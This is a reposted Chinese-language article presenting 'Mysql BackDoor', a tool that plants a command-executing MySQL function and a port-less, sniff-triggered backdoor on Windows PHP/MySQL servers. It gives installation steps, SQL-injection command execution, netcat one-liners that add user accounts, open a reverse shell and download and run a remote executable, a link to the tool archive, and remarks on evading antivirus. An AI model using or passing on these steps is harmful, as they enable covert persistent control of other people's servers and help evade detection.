Mysql BackDoorDoor(圖)
發(fā)布日期:2021-12-18 01:17 | 文章來源:CSDN
Mysql BackDoor是一款針對PHP Mysql服務器開發(fā)的后門,后門安裝后為Mysql增加一個可以執(zhí)行系統(tǒng)命令的"state"函數(shù),并且隨 Mysql進程啟動一個基于Dll的嗅探型后門,從而巧妙地實現(xiàn)了無端口,無進程,無服務的穿墻木馬.程序在WINXP、 WIN2003 MYSQL5.0.X下通過.
[安裝]
將Mysql.php傳到PHP服務器上,依填上相應的Host、User、Password、DB后,點擊"自動安裝Mysql BackDoor"
安裝成功后,Mysql上便會增加一個"state"函數(shù),同時利用Mysql進程運行一個基于嗅探的后門. 這個后門在Windows下?lián)碛信cMysql一樣的系統(tǒng)權(quán)限.
[使用state函數(shù)]
State函數(shù)實際是一個和PHP的”system()”功能相同的函數(shù),可以用來執(zhí)行系統(tǒng)命令.在”請輸入SQL命令:”處填寫要執(zhí)行的mysql語 句,如” select state("net user nohack /add")”,點擊”執(zhí)行SQL語句”后,便會得到運行結(jié)果.
[使用基于Sniff的后門]
有了state函數(shù),即使WebShell丟了,只要服務器上有SQL注入點,我們就能通過注入".php?id=1 and state('net user')"的方法在服務器上執(zhí)行命令.但是如果注入點都沒有了呢?我們?nèi)匀徽{(diào)用基于Sniff的后門控制服務器.向服務器開放的任意端口發(fā)送 以"Mysql-"開頭的數(shù)據(jù)包,便能調(diào)用這個Sniff的后門,如:
1.運行系統(tǒng)命令: nc ip 80->回車->Mysql-cmd /c net user abc /add>c:/log.txt! (注意:最后的"!"不可省略)
2.讓服務器反彈Shell到本機20082端口:先運行nc –lp 20082監(jiān)聽本機的20082端口,再nc ip 80->回車->Mysql-c-->回車
3.讓服務器下載文件:nc ip 80->回車->Mysql-http://www.x.com/door.exe -c mydoor.exe! (注意:最后的"!"不可省略)
除了發(fā)送"Mysql-c-”,其他的命令是沒有回顯的,但相應的命令已經(jīng)在服務器上運行了.
[卸載]
在Mysql上運行"drop function state"便可卸載,但同時會造成mysql進程退出,重啟后恢復正常。
詳細用法看壓縮包內(nèi)圖文說明。http://blogimg.chinaunix.net/blog/upfile2/080712123321.rar
注意:能過殺毒軟件,但過不了主動防御,主動防御太狠了,后門執(zhí)行系統(tǒng)命令、發(fā)郵件、反向連接都會被發(fā)現(xiàn)。
發(fā)送Mysql-cmd c net user abc add,mysql backdoor運行cmd命令便會被主動防御截獲:

發(fā)送Mysql-c-,mysql bookdoor運行管道重定向便會被主動防御截獲,可見卡巴斯基監(jiān)視了內(nèi)存或句柄表:

版權(quán)聲明:本站文章來源標注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務器上建立鏡像,否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學習參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。
相關(guān)文章
上一篇: